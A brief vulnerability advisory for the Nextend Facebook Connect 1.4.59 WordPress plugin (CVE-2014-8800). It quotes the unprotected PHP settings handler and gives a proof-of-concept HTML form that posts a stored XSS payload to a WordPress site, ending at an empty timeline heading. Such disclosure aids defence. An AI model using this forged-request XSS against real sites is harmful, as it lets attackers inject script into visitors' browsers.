Nextend Facebook Connect 1.4.59 XSS

Homepage:

https://wordpress.org/plugins/nextend-facebook-connect

CVE-ID

CVE-2014-8800

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

Anyone can change plugin settings.

File: nextend-facebook-connect\nextend-facebook-settings.php

if(isset($_POST['newfb_update_options'])) {
	if($_POST['newfb_update_options'] == 'Y') {
		foreach($_POST AS $k => $v){
			$_POST[$k] = stripslashes($v);
		}
		update_option("nextend_fb_connect", maybe_serialize($_POST));
		$newfb_status = 'update_success';
	}
}

Proof of Concept:

<form method="post" action="http://wordpress-instalation">
    <input type="hidden" name="newfb_update_options" value="Y">
    XSS: <textarea name="fb_login_button" rows="10" cols="40">&lt;img src=x onerror=alert(String.fromCharCode(88,83,83))&gt;</textarea>
    <input type="submit" value="Hack!">
</form>

XSS will be visible:

http://wordpress-instalation/wp-login.php

Timeline: